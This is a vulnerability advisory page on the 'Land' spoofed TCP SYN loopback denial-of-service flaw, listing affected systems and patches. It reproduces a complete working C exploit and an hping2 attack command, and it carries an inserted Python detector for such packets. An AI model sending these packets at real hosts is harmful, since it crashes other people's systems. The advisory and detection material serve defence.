A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination address and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
    
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
    
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. 

#define _BSD_SOURCE

#include <stdio.h>
#include <ctype.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <sysexits.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/*
Windows Server 2003 and XP SP2 remote DoS exploit
Tested under OpenBSD 3.6 at WinXP SP 2
Vuln by Dejan Levaja <dejan_@_levaja.com>
(c)oded by __blf 2005 RusH Security Team , http://rst.void.ru
Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor
Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy
All rights reserved.
*/

//checksum function by r0ach
u_short checksum (u_short *addr, int len)
{
	u_short *w = addr;
	int i = len;
	int sum = 0;
	u_short answer;
	while (i > 0)
	{
		sum += *w++;
		i-=2;
	}
	if (i == 1) sum += *(u_char *)w;
	sum = (sum >> 16) + (sum & 0xffff);
	sum = sum + (sum >> 16);
	return (~sum);
}
int main(int argc, char ** argv)
{
	struct in_addr src, dst;
	struct sockaddr_in sin;
	struct _pseudoheader {
		struct in_addr source_addr;
		struct in_addr destination_addr;
		u_char zero;
		u_char protocol;
		u_short length;
	} pseudoheader;
	struct ip * iph;
	struct tcphdr * tcph;
	int mysock;
	u_char * packet;
	u_char * pseudopacket;
	int on = 1;
	if( argc != 3)
	{
		fprintf(stderr, "r57windos.c by __blf\n");
		fprintf(stderr, "RusH Security Team\n");
		fprintf(stderr, "Usage: %s <dest ip> <dest port>\n", argv[0]);
		return EX_USAGE;
	}
	if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr))) == NULL)
	{
		perror("malloc()\n");
		return EX_OSERR;
	}
	inet_aton(argv[1], &src);
	inet_aton(argv[1], &dst);
	iph = (struct ip *) packet;
	iph->ip_v = IPVERSION;
	iph->ip_hl = 5;
	iph->ip_tos = 0;
	iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr));
	iph->ip_off = htons(IP_DF);
	iph->ip_ttl = 255;
	iph->ip_p = IPPROTO_TCP;
	iph->ip_sum = 0;
	iph->ip_src = src;
	iph->ip_dst = dst;
	tcph = (struct tcphdr *)(packet +sizeof(struct ip));
	tcph->th_sport = htons(atoi(argv[2]));
	tcph->th_dport = htons(atoi(argv[2]));
	tcph->th_seq = ntohl(rand());
	tcph->th_ack = rand();
	tcph->th_off = 5;
	tcph->th_flags = TH_SYN; // setting up TCP SYN flag here
	tcph->th_win = htons(512);
	tcph->th_sum = 0;
	tcph->th_urp = 0;
	pseudoheader.source_addr = src;
	pseudoheader.destination_addr = dst;
	pseudoheader.zero = 0;
	pseudoheader.protocol = IPPROTO_TCP;
	pseudoheader.length = htons(sizeof(struct tcphdr));
	if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL)
	{
		perror("malloc()\n");
		return EX_OSERR;
	}
	memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader));
	memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr));
	tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr));
	mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
	if(!mysock)
	{
		perror("socket!\n");
		return EX_OSERR;
	}
	if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
	{
		perror("setsockopt");
		shutdown(mysock, 2);
		return EX_OSERR;
	}
	sin.sin_family = PF_INET;
	sin.sin_addr = dst;
	sin.sin_port = htons(80);
	if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1)
	{
		perror("sendto()\n");
		shutdown(mysock, 2);
		return EX_OSERR;
	}
	printf("Packet sent. Remote machine should be down.\n");
	shutdown(mysock, 2);
	return EX_OK;
}
		

- Vulnerability information

14789
Multiple Vendor Malformed TCP SYN Loopback Packet Remote DoS (land)
Remote / Network Access Denial of Service
Loss of Availability Upgrade
Exploit Public Third-party Verified

- Vulnerability description

- Timeline

1997-12-17 Unknown
Unknown Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Multiple Vendor loopback (land.c) Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 2666
Yes No
1997-11-20 12:00:00 2009-07-11 06:06:00
Posted to BugTraq by m3lt <meltman@lagged.net> on November 20, 1997.

- Affected program versions

Sun SunOS 4.1.4
Sun SunOS 4.1.3_U1
SCO Unixware 2.1
SCO Open Server 5.0
SCO Open Desktop 3.0
SCO CMW+ 3.0
Novell Netware 4.1
NetBSD NetBSD 1.2.1
NetBSD NetBSD 1.2
NetBSD NetBSD 1.1
NetBSD NetBSD 1.0
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows NT 3.5.1
Microsoft Windows NT 4.0 SP3 alpha
Microsoft Windows NT 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Workstation 4.0
Microsoft Windows 95
Marconi ATM Switch 7.0.1
Marconi ATM Switch 6.1.1
Linux kernel 2.0.31
Linux kernel 2.0.30
HP HP-UX (VVOS) 10.24
HP HP-UX 11.0
HP HP-UX 10.30
HP HP-UX 10.20
HP HP-UX 10.16
HP HP-UX 10.10
HP HP-UX 10.10
HP HP-UX 10.01
HP HP-UX 10.0
HP HP-UX 9.0
FreeBSD FreeBSD 2.2.5
FreeBSD FreeBSD 2.2.4
FreeBSD FreeBSD 2.2.3
FreeBSD FreeBSD 2.2
FreeBSD FreeBSD 2.1.6 .1
FreeBSD FreeBSD 2.1.6
FreeBSD FreeBSD 2.1.5
FreeBSD FreeBSD 2.1 x
FreeBSD FreeBSD 2.1
Cisco IOS/700 1.0
Cisco IOS 11.2
Cisco IOS 11.1
Cisco IOS 11.0
Cisco IOS 10.3
BSDI BSD/OS 2.1
BSDI BSD/OS 2.0.1
BSDI BSD/OS 2.0
BSDI BSD/OS 1.1

- Unaffected program versions

NetBSD NetBSD 1.3.2
NetBSD NetBSD 1.3.1
NetBSD NetBSD 1.3
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2
Linux kernel 2.1.x
Linux kernel 2.1
Linux kernel 2.0.38
Linux kernel 2.0.37
Linux kernel 2.0.36
Linux kernel 2.0.35
Linux kernel 2.0.34
Linux kernel 2.0.33
Linux kernel 2.0.32
FreeBSD FreeBSD 2.2.8
FreeBSD FreeBSD 2.2.6
FreeBSD FreeBSD 2.2.2
FreeBSD FreeBSD 3.x
Cisco IOS 11.2.10
Cisco IOS 11.2.9 P
Cisco IOS 11.2.4 F1
Cisco IOS 11.2.4 F
Cisco IOS 11.2.4
Cisco IOS 11.1.15 IA
Cisco IOS 11.1.15 CA
Cisco IOS 11.1.15 AA
Cisco IOS 11.1.15
Cisco IOS 11.1.9 IA
Cisco IOS 11.1.7 CA
Cisco IOS 11.1.7 AA
Cisco IOS 11.1.7
Cisco IOS 11.0.17 BT
Cisco IOS 11.0.17
Cisco IOS 11.0.12 (a)BT
Cisco IOS 10.3.19 a
Cisco IOS 10.3.16
Cisco Catalyst 29xx supervisor software 2.4.401
Cisco Catalyst 29xx supervisor software 2.1.1102
BSDI BSD/OS 4.0.1
BSDI BSD/OS 4.0
BSDI BSD/OS 3.1
BSDI BSD/OS 3.0

- Vulnerability discussion

A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination address and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.

It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.

Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route the malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself, before exploitation is possible.
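As an added defender-side example (not part of this database entry), the following Python classifier recognises the Land signature described above in raw IPv4 packets taken from a capture; the sample packets are constructed here, with the Land one reusing the 192.168.1.1 / port 135 values of the hping2 line in the exploitation section.

```python
import struct
from typing import Optional

TCP_SYN = 0x02
IPPROTO_TCP = 6

def classify_ipv4_packet(pkt: bytes) -> Optional[str]:
    """Classify one raw IPv4 packet as seen on the wire.
    "land": IP src == dst, TCP sport == dport, SYN set (the signature described above).
    "same-src-dst": IP src == dst but not the full signature; never legitimate on the
    wire, so still worth an alert.  None: anything else, including truncated packets.
    Checksums are deliberately not validated: the older affected stacks fail on the
    packet whether or not they are correct, so a detector must not rely on them."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None                         # not IPv4, or truncated IP header
    ihl = (pkt[0] & 0x0F) * 4               # header length in bytes (options allowed)
    if ihl < 20 or len(pkt) < ihl:
        return None
    if pkt[12:16] != pkt[16:20]:
        return None                         # source != destination: not Land
    if pkt[9] != IPPROTO_TCP or len(pkt) < ihl + 14:
        return "same-src-dst"               # no complete TCP header to inspect
    sport, dport = struct.unpack_from("!HH", pkt, ihl)
    flags = pkt[ihl + 13]
    if sport == dport and flags & TCP_SYN:
        return "land"
    return "same-src-dst"

def scan_capture(packets) -> list:
    """Run the classifier over an iterable of raw packets; return (index, verdict) hits."""
    hits = []
    for i, pkt in enumerate(packets):
        verdict = classify_ipv4_packet(pkt)
        if verdict:
            hits.append((i, verdict))
    return hits

# Constructed sample packets (IP + TCP headers only, checksums left as zero).
# LAND_PKT: 192.168.1.1:135 -> 192.168.1.1:135 with SYN set, as in the hping2 line.
LAND_PKT = bytes.fromhex(
    "45000028 12344000 40060000 c0a80101 c0a80101"    # IPv4 header, protocol 6
    "00870087 00000001 00000000 50022000 00000000"    # TCP 135 -> 135, flags SYN
)
# An ordinary SYN, 192.168.1.5:49152 -> 192.168.1.1:135, must not be flagged.
NORMAL_SYN = bytes.fromhex(
    "45000028 56784000 40060000 c0a80105 c0a80101"
    "c0000087 00000001 00000000 50022000 00000000"
)
```

The classifier only needs the 40 header bytes, so it can be run over a pcap reader's raw frames once the link-layer header has been stripped.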

- Exploitation

The following exploits are available; additionally, it is reported that the hping2 utility may be used to launch an attack as follows:
hping2 192.168.1.1 -s 135 -p 135 -S -a 192.168.1.1

A new exploit (imland.c) has been provided to demonstrate the issue on Windows Server 2003 and XP SP2.

- Solution

Apply the appropriate patches or upgrade to an unaffected software version.

Microsoft has released an advisory and updates to address this and other issues.

Microsoft has released revised fixes to address this and other issues. Microsoft recommends installing the revised fixes even if the previous versions have been installed.

Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT 4.0 SP3
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows XP Professional
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT 4.0 SP3 alpha
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows XP Home SP2
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home
Microsoft Windows XP Home SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows 95
HP HP-UX 10.01
HP HP-UX 10.0
HP HP-UX 10.10
HP HP-UX 10.16
HP HP-UX 10.20
HP HP-UX (VVOS) 10.24
HP HP-UX 10.30
HP HP-UX 11.0
FreeBSD FreeBSD 2.2.5
SCO Open Server 5.0

- Related references

About the SCAP Chinese Community

The SCAP Chinese Community is the first open Chinese-language community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's related websites